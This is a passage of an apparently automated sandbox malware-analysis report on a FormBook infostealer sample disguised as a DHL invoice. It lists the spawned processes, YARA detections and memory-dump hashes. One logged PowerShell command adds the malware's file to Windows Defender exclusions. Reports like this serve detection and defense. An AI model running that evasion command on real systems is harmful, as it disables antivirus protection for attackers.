                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:02:35:02
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:02:35:02
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:02:35:02
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\regedit.exe
                                                                                Wow64 process (32bit):
                                                                                Commandline:"C:\Windows\regedit.exe"
                                                                                Imagebase:
                                                                                File size:370'176 bytes
                                                                                MD5 hash:999A30979F6195BF562068639FFC4426
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:4
                                                                                Start time:02:35:02
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                Imagebase:0xd00000
                                                                                File size:2'141'552 bytes
                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:02:35:03
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6540 -s 1348
                                                                                Imagebase:0x7ff7e69f0000
                                                                                File size:570'736 bytes
                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:02:35:06
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff693ab0000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:12
                                                                                Start time:02:35:33
                                                                                Start date:17/11/2024
                                                                                Path:C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe"
                                                                                Imagebase:0x1e0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:13
                                                                                Start time:02:35:34
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\SysWOW64\wextract.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\wextract.exe"
                                                                                Imagebase:0xdf0000
                                                                                File size:136'192 bytes
                                                                                MD5 hash:B9CC7E24DB7DE2E75678761B1D8BAC3E
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:14
                                                                                Start time:02:35:47
                                                                                Start date:17/11/2024
                                                                                Path:C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe"
                                                                                Imagebase:0x1e0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:15
                                                                                Start time:02:35:59
                                                                                Start date:17/11/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff6bf500000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854634582.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b960000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 78edef94c622c30e79be2f1ab011b8d1aefa7dd6f3891e2d0f543250cd01166e
                                                                                  • Instruction ID: 6de72f9bf785ec59a12799b9931337d8ec57b52f470e9229e1255ac22a09d635
                                                                                  • Opcode Fuzzy Hash: 78edef94c622c30e79be2f1ab011b8d1aefa7dd6f3891e2d0f543250cd01166e
                                                                                  • Instruction Fuzzy Hash: F4E26B71A1F7C99FE766CB6888E55A47FE0EF56300F0A05FAD089CB1A7DA186906C341
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d
                                                                                  • API String ID: 0-2564639436
                                                                                  • Opcode ID: 6ea24d4430f5a172bae467628327791b03ec6cbf19579b4bccc0457ddc22c380
                                                                                  • Instruction ID: 424d159879b485c7e3bf90c0f5f0ab34179ad807bf32e32fca051bf281629ba4
                                                                                  • Opcode Fuzzy Hash: 6ea24d4430f5a172bae467628327791b03ec6cbf19579b4bccc0457ddc22c380
                                                                                  • Instruction Fuzzy Hash: 67228731B1DA4D4FEB2DDB6898A15717BE0EF59310B1542BAD45EC71ABDE28F8438380
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8061e672c4125038a951971c1a235b633779a253bea1b330904177479137d572
                                                                                  • Instruction ID: 63cb9cd78c94a21d025eb358fb440eead9a2d6af7e17eaca0866a7db7744dd77
                                                                                  • Opcode Fuzzy Hash: 8061e672c4125038a951971c1a235b633779a253bea1b330904177479137d572
                                                                                  • Instruction Fuzzy Hash: 04C29C3070DB494FDB29DB28C4A04B5BBE1FF99301B1545BEE48AC72A6DE34E946C781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 10f8a5b76522fa4a48025f306d7599b951a05130b19b9f78ee2ce340e9ff707a
                                                                                  • Instruction ID: 7fc4587ec0eaa3ee4b1971f6335ef81d6e519f2020fec5e2ddc3e3229ed0cffd
                                                                                  • Opcode Fuzzy Hash: 10f8a5b76522fa4a48025f306d7599b951a05130b19b9f78ee2ce340e9ff707a
                                                                                  • Instruction Fuzzy Hash: 83927931A0E64E4FE769CB64C4606B477D1EF99310F0541BDD48ECB9E3DE28AA46C790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e7beb94bcd9b4ba87cd2fe3cef273239ff78828ef010cac18af38b49776759e6
                                                                                  • Instruction ID: b542fd81c6e114a56439eab978aa0add1e2bcf75fbcc9f366b79af50c1a896ad
                                                                                  • Opcode Fuzzy Hash: e7beb94bcd9b4ba87cd2fe3cef273239ff78828ef010cac18af38b49776759e6
                                                                                  • Instruction Fuzzy Hash: 0F52C530B0990D8FDB68DB6CD465A797BE1EF59300B1501BEE44EC72A2DE25ED428B81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b239dc6b0d936c70ec8ad5bb668192a0fd042af25f6c414918b24513e5c958e1
                                                                                  • Instruction ID: 9fd53745225d6a983672501e3ecf9644902acf15138d22a93c6d34a9fef285fc
                                                                                  • Opcode Fuzzy Hash: b239dc6b0d936c70ec8ad5bb668192a0fd042af25f6c414918b24513e5c958e1
                                                                                  • Instruction Fuzzy Hash: C9E17A3460DB8E4FE72DCB2484A11B1BBE2FF95301B1546BED4DAC72A1DE38A546C781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1e407f08f1134507023561e834453cdbedb17dcfebed0f2efc06baf2f0345135
                                                                                  • Instruction ID: 8b4cc771b8b582c8b6a94b9f183629687d354282b76f5e7eab41a1330c9a09dc
                                                                                  • Opcode Fuzzy Hash: 1e407f08f1134507023561e834453cdbedb17dcfebed0f2efc06baf2f0345135
                                                                                  • Instruction Fuzzy Hash: D371DA31B1DA0D4FEB6CEF689865479B3D1FB99310B01067EE49BC3296DE24F9428681
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b42b2932e85d532161db0d273b0ba4d349741b05b28bdfad5ca5d26999b95431
                                                                                  • Instruction ID: d37ba94a7c202c88ee30ded687eed1b9ecf5b8cb4fa50cbf73f6b152275240a6
                                                                                  • Opcode Fuzzy Hash: b42b2932e85d532161db0d273b0ba4d349741b05b28bdfad5ca5d26999b95431
                                                                                  • Instruction Fuzzy Hash: 4F518C3170D68D0FE72E9B789C665757BA0EB46310F0681BFD48AC71E3DD18A9068392
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: M_^$M_^$#
                                                                                  • API String ID: 0-4163921640
                                                                                  • Opcode ID: b9fae96a06c2e3e9f38546dbeaf1954ab1998d731d05e5ec885ac258c3c7069a
                                                                                  • Instruction ID: 0ae786ddddee5dbbff01b493d88022afb82233dbe11c95c4d2495d1d9f00460f
                                                                                  • Opcode Fuzzy Hash: b9fae96a06c2e3e9f38546dbeaf1954ab1998d731d05e5ec885ac258c3c7069a
                                                                                  • Instruction Fuzzy Hash: EBA15B71A1EA8A4FDB2ADB2888655B07BE0EF5534471905FEC09EC71E3DE25B807C781
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (X_I
                                                                                  • API String ID: 0-340696938
                                                                                  • Opcode ID: 9d3eef471d79ac980cb9e137b0b516eb6840b2540702b2bcdf11dddda5943793
                                                                                  • Instruction ID: c59efed1eb77ec0162eeecca6918825efbf06e913e2c38a1ea5b1f35c1d791b1
                                                                                  • Opcode Fuzzy Hash: 9d3eef471d79ac980cb9e137b0b516eb6840b2540702b2bcdf11dddda5943793
                                                                                  • Instruction Fuzzy Hash: D972077170EE498FEBBDDB5894656783BD1FF99300B0501BDE48AC72A2DE28BD428741
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PM_H
                                                                                  • API String ID: 0-3610199572
                                                                                  • Opcode ID: 566630682bc0db9ead3cfef278d97af24f46ed79c3f12860720ea053b7594af1
                                                                                  • Instruction ID: 9af0137b189c75cd6eca0fe04ef84c57183c9c0733001eb0b88d99dddb951eeb
                                                                                  • Opcode Fuzzy Hash: 566630682bc0db9ead3cfef278d97af24f46ed79c3f12860720ea053b7594af1
                                                                                  • Instruction Fuzzy Hash: 90024D62B0E94E4FEB78CBA854765747BD1EF98300B5501BED48EC72E2EE18B9068345
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: M
                                                                                  • API String ID: 0-3664761504
                                                                                  • Opcode ID: cc7831c5957c05bbd35cfa678d4effbfb81f9bbcd9360cd173e908031c544e86
                                                                                  • Instruction ID: 4146c3b5154c9f05f701f148538c2ace016164892442abac52aba6631eb754ed
                                                                                  • Opcode Fuzzy Hash: cc7831c5957c05bbd35cfa678d4effbfb81f9bbcd9360cd173e908031c544e86
                                                                                  • Instruction Fuzzy Hash: A6C18C20B1EA5E4FEB2D8F9598A05B577C1FF95310B59417DD08BC32DADD2CB9438280
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (X_I
                                                                                  • API String ID: 0-340696938
                                                                                  • Opcode ID: 5068d083f3de4da1535921d7305717ad067b66ffd909b42cabb17eae3f6c619f
                                                                                  • Instruction ID: 256d866d5c95b36c599bb8071f46fedf6c23b6c8df988e6f3d27d9587f083c0a
                                                                                  • Opcode Fuzzy Hash: 5068d083f3de4da1535921d7305717ad067b66ffd909b42cabb17eae3f6c619f
                                                                                  • Instruction Fuzzy Hash: D9614871B0EE4E4FEB7C8B5894615743BD0EF9D314F1601BAD48AC72A6DE28BD068781
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d
                                                                                  • API String ID: 0-2564639436
                                                                                  • Opcode ID: 69dc56e4a36ba800aaccbf0ba1653f5465aec1a5da13fb860a3a2de20f85ec1a
                                                                                  • Instruction ID: 8a9e4087672b96ebee130597fd4e71dd2ab95ea8acc055e268c1068dc52791fa
                                                                                  • Opcode Fuzzy Hash: 69dc56e4a36ba800aaccbf0ba1653f5465aec1a5da13fb860a3a2de20f85ec1a
                                                                                  • Instruction Fuzzy Hash: F761FE70B29A084FEB6DDF08D491A7177D0FB58304B5201B8D84ECB2ABEE25FD538681
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-3629985089
                                                                                  • Opcode ID: 5f906a0b90ecb02e56b2af3bbea34602701b1fcef910d8e0e10f87b8b0c3c28f
                                                                                  • Instruction ID: 41c70fe875641c15088cc111f2ce823b54a7b7b36f74de147eedf889ae5ad698
                                                                                  • Opcode Fuzzy Hash: 5f906a0b90ecb02e56b2af3bbea34602701b1fcef910d8e0e10f87b8b0c3c28f
                                                                                  • Instruction Fuzzy Hash: 0E516730A1EA8A4FD76ACB6888655717BE0EF0A34071640FDC0DBC75A3DA24BC078791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-3629985089
                                                                                  • Opcode ID: e2e20ce689c6b53b402ebbe2108566aaef26ab1e0c2d3a904594eb13ba4d6fb7
                                                                                  • Instruction ID: b2d9a688da8e1e0b817498f3be51bb1b69211e3e372a28a71ebec0394ed13809
                                                                                  • Opcode Fuzzy Hash: e2e20ce689c6b53b402ebbe2108566aaef26ab1e0c2d3a904594eb13ba4d6fb7
                                                                                  • Instruction Fuzzy Hash: B1312130A29A094BDBA9EF28C8515B1B7E0EF08304B5148BDC49F839A6DE21BC5387C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Bv%\
                                                                                  • API String ID: 0-3389757040
                                                                                  • Opcode ID: 573dafbfe8fcb21ecd0610b1a59bdbf344769b61a5cf7d73b0fdca65bf695c8d
                                                                                  • Instruction ID: 00569ed75995da0402f0b977d2624ec8b4f4f764f1c426149ea31b1130638304
                                                                                  • Opcode Fuzzy Hash: 573dafbfe8fcb21ecd0610b1a59bdbf344769b61a5cf7d73b0fdca65bf695c8d
                                                                                  • Instruction Fuzzy Hash: 01C012726556148EC228179C09535717A51EB457007231575A94F5B2728D74A60284C2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Cp
                                                                                  • API String ID: 0-1868626278
                                                                                  • Opcode ID: 850196000ba423df10b179e22535e67a25dd00477b7df8c1e146e43088e38935
                                                                                  • Instruction ID: ce1cdf14d14dd747d6c5121eb272f87d8ffdf15ab803566eac15ffc5df12c1be
                                                                                  • Opcode Fuzzy Hash: 850196000ba423df10b179e22535e67a25dd00477b7df8c1e146e43088e38935
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8503c380c2dfc1b3e9d02390e5d4330d59c18187c70c32ca75c00bf048585f4
                                                                                  • Instruction ID: 97dee67d58602fc6fcfc081aee26741f4b08a1ad26b939e0035c15d4713ee56e
                                                                                  • Opcode Fuzzy Hash: e8503c380c2dfc1b3e9d02390e5d4330d59c18187c70c32ca75c00bf048585f4
                                                                                  • Instruction Fuzzy Hash: 7C223771F0994D8FEBA8DB5CC8657A87FE1FF98301F5500B9D04CC76A2DE28A84A8741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 98b1b2720a71b320dad11d10b051b8724ef2e08788c0118669e066d101646eef
                                                                                  • Instruction ID: 69efd555fc8e7c8413b03e9488f3baee6b20085234e49f29ba1b145080277963
                                                                                  • Opcode Fuzzy Hash: 98b1b2720a71b320dad11d10b051b8724ef2e08788c0118669e066d101646eef
                                                                                  • Instruction Fuzzy Hash: 55023A71B0E94D4FE378DF9C892657477D1FF9D310B4602BAE08DC72B2DA18AA0647A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0078f484d274a08fd252464c4172fcf2caf907bf5dd5943b11160edb88d67a98
                                                                                  • Instruction ID: de94df3773448c603dec6e5f6d6a8f66e64186b1fc5d74577d818d5919d2aacf
                                                                                  • Opcode Fuzzy Hash: 0078f484d274a08fd252464c4172fcf2caf907bf5dd5943b11160edb88d67a98
                                                                                  • Instruction Fuzzy Hash: DDF16B31B0EB5E4FEF69EB68D8605F93BA1FF55310B0502BAC459CB1E6DD24A9038780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1f361cf8fa640e9dd531c91ee4b23d74b78c72b578edb73d5a7b37a9685f23b
                                                                                  • Instruction ID: a1afad5e1e35c147cddd388a009eef28fedae42e736f74929fde9709d9d85340
                                                                                  • Opcode Fuzzy Hash: a1f361cf8fa640e9dd531c91ee4b23d74b78c72b578edb73d5a7b37a9685f23b
                                                                                  • Instruction Fuzzy Hash: 4CC16431A0EA0A4BFF2C9B2884A15F977C1EF98310B2501BDD49FD75E6DD29F9468780
                                                                                  Memory Dump Source
